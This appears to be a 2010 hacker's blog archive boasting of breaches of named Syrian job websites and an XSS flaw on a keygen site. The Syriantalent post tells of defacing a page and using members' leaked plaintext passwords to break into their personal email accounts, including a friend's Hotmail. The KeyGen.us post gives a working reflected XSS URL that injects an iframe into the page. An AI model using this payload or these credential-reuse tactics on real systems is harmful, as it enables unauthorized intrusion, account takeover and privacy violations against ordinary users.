Archive for Web security

Job.sy: Hacked

Posted in SQL injection with tags , , , , on October 26, 2010 by Xacker

Job.sy: Hacked

As promised earlier this month, I’ve nailed Job.sy today.. in other words, hacked it 🙂

Here is a screenshot off their admin control panel.. uh oh .. I mean, their new admin control panel 🙂

and another off their user table

Enjoy, and stay tuned for MOARRRRRR 😉

Advertisements

Syriantalent.com: Hacked

Posted in SQL injection with tags , , , on October 14, 2010 by Xacker

A while ago my company email received a job employment website advertisement. I bookmarked their URL and paid them a visit that day, by the end of the day they were all dancing of joy.

I had total control over their website but I’m not into destroying people’s work and ruining their lives.. nah I ain’t seriously 😛 .. so I only altered the “Privacy Statement” page which contains bullsh!t about people’s data being safe and all as members passwords were stored as plain-text.

Any attacker who gets through their security measures can have a copy of every member phone number, email, password, personal data, CVs, personal pictures.. etc.

The funny part is that I know (and you should too) that most people use one password.. two passwords at max for.. listen to this.. for EVERYTHING!

I’ts not easy to remember 5 passwords or more, me for example use two passwords, one for registration at some random or non-important website; the other I use for my personal email & important websites to me (my blog, my ArabTeam2000 password.. etc)

I’ve tried couple of passwords on registered members personal emails, some worked, some didn’t (perhaps they’ve changed it since the last time they have registered with the website).

One of my friends had an account their, I was able to login to his Hotmail account and he was like “Oh man! please don’t do anything, I have private stuff there you know.. I trust you dude .. completely” 😀

Finally, if you take a second look at the picture up there and notice the date of the attack, it happened 15 days ago.. here is how much safety you get from them: http://www.syriantalent.com/pages.php?sectionid[]=6&pageid=19&lang=en

Enjoy, and stay tuned for a “Job.sy: Hacked” news 😉

update (26/10/2010): have you waited too long? 😉 check out: https://xacker.wordpress.com/2010/10/26/job-sy-hacked/

KeyGen.us users: vulnerable to XSS attacks

Posted in XSS with tags , , on October 14, 2010 by Xacker

Keygen.us (porn free) is vulnerable to XSS attacks which might be applied on poor users

example:

http://www.keygen.us/search.shtml?q=%22%3E%3Ciframe%20width=”100%”%20height=”100%”%20style=”position:absolute;top:0;left:0″%20src=%22https://xacker.wordpress.com%22%20/%3E&w=cracks

w00ps!

isn’t that my blog ? 🙂

This is a simple demonstration, the attack vector might be extended through Clickjacking and/or Tabjacking techniques.

Update: here is a screenshot in case they fix it 🙂

Later.